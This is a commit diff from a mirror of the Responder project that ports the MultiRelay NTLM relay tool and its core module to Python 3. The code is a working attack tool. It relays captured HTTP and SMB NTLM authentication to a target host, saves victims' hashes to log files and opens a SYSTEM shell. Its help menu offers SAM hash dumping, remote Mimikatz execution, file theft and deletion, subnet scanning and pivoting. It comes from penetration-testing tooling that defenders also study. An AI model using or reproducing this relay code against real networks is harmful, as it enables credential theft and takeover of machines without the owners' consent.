github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-08-21 22:03:30 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Updated MultiRelay and associated files for use with Python3

Browse source
This commit is contained in:
nbadev2 2020-12-30 16:25:31 -05:00
commit 65971d14ea
4 changed files with 338 additions and 338 deletions
Download patch file Download diff file Expand all files Collapse all files

240
tools/MultiRelay.py
View file

@ -23,17 +23,17 @@ import time
import random
import subprocess
from threading import Thread
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
try:
from Crypto.Hash import MD5
except ImportError:
print "\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes."
print "You can install it on debian based os with this command: apt-get install python-crypto"
print "The Sam file will be saved anyway and you will have the bootkey.\033[0m\n"
print ("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
print ("You can install it on debian based os with this command: apt-get install python-crypto")
print ("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
try:
import readline
except:
print "Warning: readline module is not available, you will not be able to use the arrow keys for command history"
print ("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
pass
from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import *
@ -72,18 +72,18 @@ parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (script
options, args = parser.parse_args()
if options.TARGET is None:
print "\n-t Mandatory option is missing, please provide a target.\n"
print ("\n-t Mandatory option is missing, please provide a target.\n")
parser.print_help()
exit(-1)
if options.UserToRelay is None:
print "\n-u Mandatory option is missing, please provide a username to relay.\n"
print ("\n-u Mandatory option is missing, please provide a username to relay.\n")
parser.print_help()
exit(-1)
if options.ExtraPort is None:
options.ExtraPort = 0
if not os.geteuid() == 0:
print color("[!] MultiRelay must be run as root.")
print (color("[!] MultiRelay must be run as root."))
sys.exit(-1)
OneCommand = options.OneCommand
@ -98,46 +98,46 @@ Pivoting = [2]
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def ShowWelcome():
print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)
print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com'
print 'Usernames to relay (-u) are case sensitive.'
print 'To kill this script hit CTRL-C.\n'
print color('/*',8,1)
print 'Use this script in combination with Responder.py for best results.'
print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n'
print 'This tool listen on TCP port 80, 3128 and 445.'
print 'For optimal pwnage, launch Responder only with these 2 options:'
print '-rv\nAvoid running a command that will likely prompt for information like net use, etc.'
print 'If you do so, use taskkill (as system) to kill the process.'
print color('*/',8,1)
print color('\nRelaying credentials for these users:',8,1)
print color(UserToRelay,4,1)
print '\n'
print (color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
print ('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com')
print ('Usernames to relay (-u) are case sensitive.')
print ('To kill this script hit CTRL-C.\n')
print (color('/*',8,1))
print ('Use this script in combination with Responder.py for best results.')
print ('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
print ('This tool listen on TCP port 80, 3128 and 445.')
print ('For optimal pwnage, launch Responder only with these 2 options:')
print ('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
print ('If you do so, use taskkill (as system) to kill the process.')
print (color('*/',8,1))
print (color('\nRelaying credentials for these users:',8,1))
print (color(UserToRelay,4,1))
print ('\n')
ShowWelcome()
def ShowHelp():
print color('Available commands:',8,0)
print color('dump',8,1)+' -> Extract the SAM database and print hashes.'
print color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)'
print color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)'
print color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)'
print color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)'
print color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\'
print color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)'
print color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to'
print color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)'
print color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)'
print color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)'
print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)'
print color('help',8,1)+' -> Print this message.'
print color('exit',8,1)+' -> Exit this shell and return in relay mode.'
print ' If you want to quit type exit and then use CTRL-C\n'
print color('Any other command than that will be run as SYSTEM on the target.\n',8,1)
print (color('Available commands:',8,0))
print (color('dump',8,1)+' -> Extract the SAM database and print hashes.')
print (color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)')
print (color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)')
print (color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)')
print (color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
print (color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
print (color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)')
print (color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
print (color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)')
print (color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
print (color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
print (color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
print (color('help',8,1)+' -> Print this message.')
print (color('exit',8,1)+' -> Exit this shell and return in relay mode.')
print (' If you want to quit type exit and then use CTRL-C\n')
print (color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
Logs = logging
@ -153,7 +153,7 @@ def UploadContent(File):
try:
RunFinger(Host[0])
except:
print "The host %s seems to be down or port 445 down."%(Host[0])
print ("The host %s seems to be down or port 445 down."%(Host[0]))
sys.exit(1)
@ -190,7 +190,7 @@ def ConnectToTarget():
except:
try:
sys.exit(1)
print "Cannot connect to target, host down?"
print ("Cannot connect to target, host down?")
except:
pass
@ -219,45 +219,45 @@ class HTTPProxyRelay(BaseRequestHandler):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
smbdata = s.recv(2048) #got it here.
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
@ -270,24 +270,24 @@ class HTTPProxyRelay(BaseRequestHandler):
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent."
print ("[+] SMB Session Auth sent.")
s.send(buffer1)
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
self.request.close()
return None
else:
else:
##Any other type of request, send a 407.
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
self.request.send(str(Response))
except Exception:
self.request.close()
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
pass
class HTTPRelay(BaseRequestHandler):
@ -316,11 +316,11 @@ class HTTPRelay(BaseRequestHandler):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
@ -340,21 +340,21 @@ class HTTPRelay(BaseRequestHandler):
smbdata = s.recv(2048) #got it here.
## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
@ -367,25 +367,25 @@ class HTTPRelay(BaseRequestHandler):
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent."
print ("[+] SMB Session Auth sent.")
s.send(buffer1)
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
self.request.close()
return None
else:
else:
##Any other type of request, send a 401.
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
self.request.send(str(Response))
except Exception:
self.request.close()
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
pass
class SMBRelay(BaseRequestHandler):
@ -456,11 +456,11 @@ class SMBRelay(BaseRequestHandler):
if Pivoting[0] == "1":
pass
else:
print "[+] SMB Session Auth sent."
print ("[+] SMB Session Auth sent.")
s.send(buffer1)
smbdata = s.recv(4096)
#We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account.
@ -480,9 +480,9 @@ class SMBRelay(BaseRequestHandler):
return None
except Exception:
self.request.close()
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
pass
#Interface starts here.
@ -499,20 +499,20 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
# On this block we do some verifications before dropping the user into the shell.
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target."
print "[+] Hashes were saved anyways in Responder/logs/ folder.\n"
print ("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
print ("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == "\x73\x8d":
print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
print ("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == "\x73\x5e":
print "[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n"
print ("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
del ShellOpen[:]
return False
@ -533,14 +533,14 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1":
pass
else:
print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
print ("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned."
print ("[+] Tree Connect AndX denied. Bad Network Name returned.")
del ShellOpen[:]
return False
@ -549,7 +549,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1":
pass
else:
print "[+] Looks good, "+Username+" has admin rights on C$."
print ("[+] Looks good, "+Username+" has admin rights on C$.")
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate()
@ -560,12 +560,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
## Run one command.
if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
print "[+] Authenticated."
print ("[+] Authenticated.")
if OneCommand != None:
print "[+] Running command: %s"%(OneCommand)
print ("[+] Running command: %s"%(OneCommand))
RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
if Dump:
print "[+] Dumping hashes"
print ("[+] Dumping hashes")
DumpHashes(data, s, Target[0])
os._exit(1)
@ -574,10 +574,10 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1":
pass
else:
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
print ("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
ShowHelp()
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
print color('Connected to %s as LocalSystem.'%(Target[0]),2,1)
print (color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
while True:
@ -617,7 +617,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
Help = re.findall('^help', Cmd[0])
if Cmd[0] == "exit":
print "[+] Returning in relay mode."
print ("[+] Returning in relay mode.")
del Cmd[:]
del ShellOpen[:]
return None
@ -647,7 +647,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
del Cmd[:]
else:
print File+" does not exist, please specify a valid file."
print (File+" does not exist, please specify a valid file.")
del Cmd[:]
if Delete:
@ -669,7 +669,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
del Cmd[:]
else:
print RunAsFileName+" does not exist, please specify a valid file."
print (RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if LCmd:
@ -685,7 +685,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print MimikatzFilename+" does not exist, please specify a valid file."
print (MimikatzFilename+" does not exist, please specify a valid file.")
del Cmd[:]
if Mimi32:
@ -697,12 +697,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print Mimikatzx86Filename+" does not exist, please specify a valid file."
print (Mimikatzx86Filename+" does not exist, please specify a valid file.")
del Cmd[:]
if Pivot:
if Pivot[0] == Target[0]:
print "[Pivot Verification Failed]: You're already on this host. No need to pivot."
print ("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
del Pivot[:]
del Cmd[:]
else:
@ -718,7 +718,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
if Status == True:
print "[+] Pivoting to %s."%(Pivot[0])
print ("[+] Pivoting to %s."%(Pivot[0]))
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -734,11 +734,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
return None
if Status == False:
print "[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host."
print ("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
del Cmd[:]
del Pivot[:]
else:
print RunAsFileName+" does not exist, please specify a valid file."
print (RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if Scan:
@ -762,11 +762,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
del Cmd[:]
else:
print SysSVCFileName+" does not exist, please specify a valid file."
print (SysSVCFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if data is None:
print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n"
print ("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -789,7 +789,7 @@ def serve_thread_tcp(host, port, handler):
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
except:
print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)
print (color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
def main():
try:

372
tools/MultiRelay/RelayMultiCore.py
View file

@ -24,7 +24,7 @@ import re
import datetime
import threading
import uuid
from RelayMultiPackets import *
from MultiRelay.RelayMultiPackets import *
from odict import OrderedDict
from base64 import b64decode, b64encode
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump')))
@ -57,17 +57,17 @@ class Packet():
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
if not os.path.isfile(outfile):
with open(outfile,"w") as outf:
outf.write(data + '\n')
return
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False
elif re.search(re.escape("$"), user):
return False
with open(outfile,"a") as outf2:
outf2.write(data + '\n')
if not os.path.isfile(outfile):
with open(outfile,"w") as outf:
outf.write(data + '\n')
return
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False
elif re.search(re.escape("$"), user):
return False
with open(outfile,"a") as outf2:
outf2.write(data + '\n')
#Function used to verify if a previous auth attempt was made.
def ReadData(Outfile, Client, User, Domain, Target, cmd):
@ -75,7 +75,7 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
if re.search(Login.encode('hex'), filestr.read().encode('hex')):
print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)
print ("[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User))
return True
else:
@ -84,12 +84,12 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
raise
def ServeOPTIONS(data):
WebDav= re.search('OPTIONS', data)
if WebDav:
Buffer = WEBDAV_Options_Answer()
return str(Buffer)
WebDav= re.search('OPTIONS', data)
if WebDav:
Buffer = WEBDAV_Options_Answer()
return str(Buffer)
return False
return False
def IsSMBAnonymous(data):
SSPIStart = data.find('NTLMSSP')
@ -101,168 +101,168 @@ def IsSMBAnonymous(data):
return False
def ParseHTTPHash(data, key, client, UserToRelay, Host, Pivoting):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if client == Host:
if Pivoting[0] == "1":
pass
else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail."
print ("[+] Attempting reflective NTLM Relay, this is likely to fail." )
else:
if Pivoting[0] == "1":
pass
else:
print "[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445)))
print ("[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if ('!' + User) in UserToRelay:
print "[+] Username: %s is blacklisted, dropping connection." % User
print ("[+] Username: %s is blacklisted, dropping connection." % User)
return None, None
elif User in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1":
return User, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(User)
print ("[+] Username: %s is whitelisted, forwarding credentials."%(User))
if ReadData("SMBRelay-Session.txt", client, User, HostName, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None
else:
return User, HostName
return User, HostName
else:
print "[+] Username: %s not in target list, dropping connection."%(User)
return None, None
print ("[+] Username: %s not in target list, dropping connection."%(User))
return None, None
if NthashLen > 24:
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if NthashLen > 24:
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if client == Host:
if Pivoting[0] == "1":
pass
else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail."
print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else:
if Pivoting[0] == "1":
pass
else:
print "[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445)))
print ("[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if User in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1":
return User, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(User)
print ("[+] Username: %s is whitelisted, forwarding credentials."%(User))
if ReadData("SMBRelay-Session.txt", client, User, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None
else:
return User, Domain
return User, Domain
else:
print "[+] Username: %s not in target list, dropping connection."%(User)
return None, None
print ("[+] Username: %s not in target list, dropping connection."%(User))
return None, None
def ParseSMBHash(data,client, challenge,UserToRelay,Host,Pivoting): #Parse SMB NTLMSSP v1/v2
SSPIStart = data.find('NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
